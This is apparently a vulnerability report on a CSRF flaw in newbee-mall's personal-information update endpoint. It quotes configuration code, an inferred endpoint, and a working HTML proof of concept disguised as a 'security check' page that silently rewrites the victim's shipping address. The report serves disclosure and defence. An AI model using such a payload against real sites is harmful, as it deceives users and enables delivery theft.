CSRF Vulnerability in Personal Information Update

[flashzyc]

CSRF Vulnerability in Personal Information Update

Summary

A CSRF vulnerability exists in the personal information update endpoint /personal/updateInfo. Attackers can modify users' personal information including shipping addresses, potentially redirecting deliveries to attacker-controlled locations.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/personal/updateInfo");
        // ❌ Only authentication check, no CSRF protection
    }
}

Endpoint-Level Code Analysis

Based on project structure, the personal information update endpoint likely follows this pattern:

@PostMapping("/personal/updateInfo")
@ResponseBody
public Result updateUserInfo(@RequestBody MallUser mallUser, HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ Allows modification of sensitive user data including address
    mallUser.setUserId(user.getUserId());
    return mallUserService.updateUserInfo(mallUser);
}

Security Issues:

1. ❌ No CSRF token validation
2. ⚠️ Can modify shipping address to attacker's location
3. ⚠️ Combined with order CSRF, enables complete delivery hijacking

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Profile Verification Required</title>
</head>
<body>
    <h2>🔐 Security Check: Verify Your Information</h2>
    <p>We're updating our security settings. Please verify your account...</p>
    
    <script>
        // Modify user's shipping address
        fetch('http://localhost:28089/personal/updateInfo', {
            method: 'POST',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                nickName: 'User',
                introduceSign: 'Normal user',
                address: '123 Attacker Street, Hacker City, 99999',  // Attacker's address
                // Other user fields remain unchanged
            })
        })
        .then(response => response.json())
        .then(data => {
            document.body.innerHTML = '<h3>✅ Verification complete! Thank you.</h3>';
        });
    </script>
</body>
</html>

Impact

User information tampering and delivery hijacking - Attackers can redirect product deliveries to their own addresses, leading to theft and financial loss for users.

---

CVSS Score: 7.3 (High)